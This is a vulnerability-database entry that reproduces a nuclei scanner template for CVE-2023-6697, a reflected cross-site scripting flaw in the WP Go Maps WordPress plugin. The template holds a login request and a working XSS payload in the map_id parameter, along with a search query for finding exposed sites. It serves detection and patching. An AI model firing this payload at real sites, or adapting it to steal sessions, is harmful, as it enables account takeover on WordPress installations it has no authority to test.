Lucene search
K

WP Go Maps (formerly WP Google Maps) < 9.0.29 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WP Go Maps plugin is vulnerable to Cross-Site Scripting due to insufficient input validation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6697
24 Jan 202415:26
circl
CNNVD
WordPress Plugin WP Go Maps Cross-Site Scripting Vulnerability
24 Jan 202400:00
cnnvd
CVE
CVE-2023-6697
24 Jan 202413:52
cve
Cvelist
CVE-2023-6697 WP Go Maps (formerly WP Google Maps) <= 9.0.28 - Reflected Cross-Site Scripting
24 Jan 202413:52
cvelist
NVD
CVE-2023-6697
24 Jan 202414:15
nvd
OSV
CVE-2023-6697
24 Jan 202414:15
osv
Patchstack
WordPress WP Go Maps Plugin <= 9.0.28 is vulnerable to Cross Site Scripting (XSS)
24 Jan 202400:00
patchstack
Prion
Cross site scripting
24 Jan 202414:15
prion
RedhatCVE
CVE-2023-6697
23 May 202502:07
redhatcve
Vulnrichment
CVE-2023-6697
24 Jan 202413:52
vulnrichment
Rows per page
id: CVE-2023-6697

info:
  name: WP Go Maps (formerly WP Google Maps) < 9.0.29 - Cross-Site Scripting
  author: iamnoooob,ritikchaddha
  severity: medium
  description: |
    The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Authenticated users can inject malicious JavaScript via reflected XSS in the map_id parameter, potentially stealing administrator session cookies or performing administrative actions.
  remediation: |
    Update WP Go Maps plugin to version 9.0.29 or later.
  reference:
    - https://wpscan.com/vulnerability/ffcebd9d-82fe-4a30-8ad6-cf6c03753d4c/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6697
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6697
    cwe-id: CWE-79
    epss-score: 0.0104
    epss-percentile: 0.5981
    cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/wp-google-maps"
    vendor: wpgmaps
    product: wp_go_maps
  tags: cve,cve2023,wp,wp-plugin,wordpress,xss,wp-go-maps,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1aa%27\"><img+src%3Dx+onerror%3Dalert%28document.domain%29> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src="x" onerror="alert(document.domain)">'
          - 'Map Alignment</legend>'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022067c3770e8e94b201cb0e595a8ecbf55828ca211c7debcb7fc3172cb96d840fd6022100ce97daa70730c889a7563fae28c7d8b7e989ca43229ace34507f5946c94754c3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.16.1
EPSS0.0104
SSVC
23